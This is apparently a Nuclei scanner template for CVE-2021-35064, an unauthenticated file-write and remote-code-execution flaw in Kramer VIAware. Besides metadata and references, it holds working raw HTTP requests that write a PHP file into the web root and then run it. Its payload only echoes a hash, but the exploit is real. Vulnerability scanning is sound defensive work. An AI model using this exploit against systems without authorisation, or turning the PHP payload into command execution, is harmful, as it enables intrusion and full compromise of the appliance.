id: CVE-2021-35064

info:
  name: Kramer VIAware - Privilege Escalation and Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Kramer VIAware, all tested versions, allows privilege escalation and remote code execution. If the web interface is reachable, an unauthenticated attacker can write attacker-controlled content to an arbitrary path through ajaxPages/writeBrowseFilePathAjax.php; writing a PHP file into the web root yields command execution, and the misconfigured sudoers permissions on the appliance allow that execution to be escalated.
  impact: |
    Unauthenticated attackers can write and then execute arbitrary PHP code via the unauthenticated file write, leading to complete compromise of the Kramer VIAware system.
  remediation: |
    Apply the latest firmware update provided by Kramer, which corrects the sudoers permissions and adds proper validation to the web interface.
  reference:
    - http://packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html
    - https://www.kramerav.com/us/product/viaware
    - https://www.exploit-db.com/exploits/50856
    - https://write-up.github.io/kramerav/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35064
    cwe-id: CWE-269
    epss-score: 0.89527
    epss-percentile: 0.9957
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
    fofa-query: icon_hash="1521468900"
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln

variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 490a0046304402207069accfddc542f4b15d803c77cad0df3148c3744828a2d123dbf86ee0fa3e3c02203a2d619e02ea278facc3583b2b9f7859fe6635cd9ac50843041799fba2770499:922c64590222798bb761d5b6d8e72950